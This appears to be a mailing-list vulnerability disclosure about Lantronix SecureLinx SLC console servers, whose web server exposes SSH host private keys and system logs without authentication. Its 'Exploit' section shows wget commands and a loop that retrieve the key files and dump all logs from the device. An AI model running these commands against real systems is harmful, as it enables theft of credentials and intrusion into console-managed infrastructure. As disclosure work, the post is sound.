Hi, I stumbled on another bug during my review for console servers: Summary: Lantronix SecureLinx console server: Retrieval of ssh-private keys and system logfiles Confirmed on SLC32, Software version: 2.0, 3.0 very likely on all models of SLC series (SLC8, 16, 32, 48) www.lantronix.com Details: Lantronix console servers come with a mini_httpd which doesn't care much in its configuration in the subdirectories of DocRoot about Unix acls. Lantronix SLC' have their /etc/ssh directory below DocumentRoot. One can easily retrieve ssh private keys through the network without providing credentials, thus rendering ssh-encryption close to useless. Also one can read logfiles through the network. Though the directory is named /cifsshare/logs/ it contains system logs, potentially also snifferlogs from serial console sessions. Note that console servers provide administrative console access to devices hooked up on their serial lines (up to 48) Vulnerable Versions: Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 (current) Patches/Workarounds: Bugfix pending. Vendor is working on 3.1, to be released in August. Supposedly fixed by then. "Exploit": %%%%%%%%%%%%%%%% myprompt:~ # ssh slc The authenticity of host 'slc (192.168.50.205)' can't be established. RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts. Welcome to the SLC login: root Password: Connection to slc closed. myprompt:~ # tail -1 .ssh/known_hosts slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09 9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs 7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= myprompt:~ # wget -q -O - https://slc/etc <HTML><HEAD><TITLE>Index of etc/</TITLE></HEAD> <BODY BGCOLOR="#99cc99"><H4>Index of etc/</H4> <PRE> -rw------- 1 root 672 Jan 1 1970 ssh_host_dsa_key -rw-r--r-- 1 root 601 Jan 1 1970 ssh_host_dsa_key.pub -rw------- 1 root 526 Jan 1 1970 ssh_host_key -rw-r--r-- 1 root 330 Jan 1 1970 ssh_host_key.pub -rw------- 1 root 883 Jan 1 1970 ssh_host_rsa_key -rw-r--r-- 1 root 221 Jan 1 1970 ssh_host_rsa_key.pub </PRE> <HR> <ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/";>mini_httpd/1.15c 02m ay2001</A></ADDRESS> </BODY></HTML> myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8 oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none) myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY -----BEGIN RSA PRIVATE KEY----- -----END RSA PRIVATE KEY----- myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY -----BEGIN DSA PRIVATE KEY----- -----END DSA PRIVATE KEY----- myprompt:~ # wget -O - -q https://slc/cifsshare/logs/ <HTML><HEAD><TITLE>Index of cifsshare/logs/</TITLE></HEAD> <BODY BGCOLOR="#99cc99"><H4>Index of cifsshare/logs/</H4> <PRE> lrwxrwxrwx Oct 21 2004 authentication <A HREF="-> ../../../var/log/secure">-> ../../../var/log/secure</A> lrwxrwxrwx Oct 21 2004 devports <A HREF="-> ../../../var/log/devports">-> ../../../var/log/devports</A> lrwxrwxrwx Oct 21 2004 diag <A HREF="-> ../../../var/log/diag">-> ../../../var/log/diag</A> lrwxrwxrwx Oct 21 2004 general <A HREF="-> ../../../var/log/general">-> ../../../var/log/general</A> lrwxrwxrwx Oct 21 2004 network <A HREF="-> ../../../var/log/network">-> ../../../var/log/network</A> lrwxrwxrwx Oct 21 2004 services <A HREF="-> ../../../var/log/services">-> ../../../var/log/services</A> lrwxrwxrwx Oct 21 2004 sw <A HREF="-> ../../../var/log/sw">-> ../../../var/log/sw</A> </PRE> <HR> <ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/";>mini_httpd/1.15c 02may2001</A></ADDRESS> </BODY></HTML> myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk '{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done [.. too long to list it here, but you have enough phantasy ..] %%%%%%%%%%%%%%%% more to come. Cheers, Dirk -- Dr. Dirk Wetter http://drwetter.org Consulting IT-Security + Open Source Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153
